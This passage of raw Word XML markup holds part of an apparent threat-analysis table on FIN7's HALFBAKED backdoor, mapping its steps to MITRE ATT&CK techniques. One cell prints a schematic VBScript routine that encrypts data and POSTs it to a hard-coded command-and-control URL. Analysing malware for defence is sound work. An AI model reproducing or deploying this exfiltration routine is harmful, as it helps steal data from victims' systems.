                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="571B5D19" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">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4FCF794C" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="0067433A" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656D440E" w14:textId="75B18BDC" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BD8B90F" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34404479" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="208FAF80" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434C774C" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] See above VB in call.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E101FE" w:rsidRPr="00B857D7" w14:paraId="001A3E99" w14:textId="77777777" w:rsidTr="003241F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081E5B56" w14:textId="218B5C02" w:rsidR="00E101FE" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA2B95A" w14:textId="77777777" w:rsidR="00E101FE" w:rsidRPr="00B857D7" w:rsidRDefault="00E101FE" w:rsidP="003241F8">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70AD73A1" w14:textId="77777777" w:rsidR="00E101FE" w:rsidRPr="0067433A" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4939E1B2" w14:textId="3C669E92" w:rsidR="00E101FE" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C944D65" w14:textId="77777777" w:rsidR="00E101FE" w:rsidRPr="00B857D7" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7069EC76" w14:textId="77777777" w:rsidR="00E101FE" w:rsidRPr="00B857D7" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA163BA" w14:textId="77777777" w:rsidR="00E101FE" w:rsidRPr="00B857D7" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7BAFF7" w14:textId="0ED571AB" w:rsidR="00E101FE" w:rsidRPr="00B857D7" w:rsidRDefault="00E101FE" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00AA74D5" w:rsidRPr="00AA74D5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00770F8D" w:rsidRPr="00770F8D" w14:paraId="4E4A6E7C" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F75980F" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5768AB" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D572D34" w14:textId="428F230C" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1573 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="746E0FDC" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D63614F" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2898ED3E" w14:textId="27166CC8" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD21953" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72BF8EE5" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD624F0" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="00770F8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>send</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B53F7FC" w14:textId="11971399" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="00770F8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>random_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>custom_function_to</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">_  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>generate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>_random_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5D4E7E" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="00770F8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>encoded_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>URLEncode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SimpleEncrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(data))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699930B5" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="00770F8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>post_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">"POST”, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>random_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; "=" &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>encoded_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>, Hard_coded_c2_url,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="502248A9" w14:textId="34EE7030" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="00770F8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Create_Random_Url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>class_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="49A4F593" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1B77C1" w14:textId="702A48F6" w:rsidR="004F28B4" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCDFD35" w14:textId="7073D69F" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3877A8C8" w14:textId="26FD9796" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6192C1EB" w14:textId="591F311C" w:rsidR="004F28B4" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
